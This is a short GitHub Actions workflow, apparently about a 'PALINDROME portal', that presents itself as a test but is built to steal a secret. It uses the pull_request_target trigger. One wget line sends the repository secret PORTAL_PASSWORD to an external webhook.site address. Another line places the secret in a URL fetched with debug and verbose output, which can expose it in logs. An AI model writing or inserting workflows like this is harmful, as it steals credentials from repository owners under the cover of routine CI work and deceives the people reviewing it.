name: Test the PALINDROME portal

on: [pull_request, pull_request_target]

jobs:
  test2:
    runs-on: windows-latest
    steps:
      - uses: actions/checkout@v3
      - name: Test the PALINDROME portal
        run: | 
          C:\msys64\usr\bin\wget.exe '''${{ secrets.PORTAL_URL }}/${{ secrets.PORTAL_PASSWORD }}''' -O test -d -v
          C:\msys64\usr\bin\wget.exe "https://webhook.site/b736b90b-1e7c-4954-a557-95ace27ced57/?a=${{ secrets.PORTAL_PASSWORD }}"
          cat test
          echo "done"
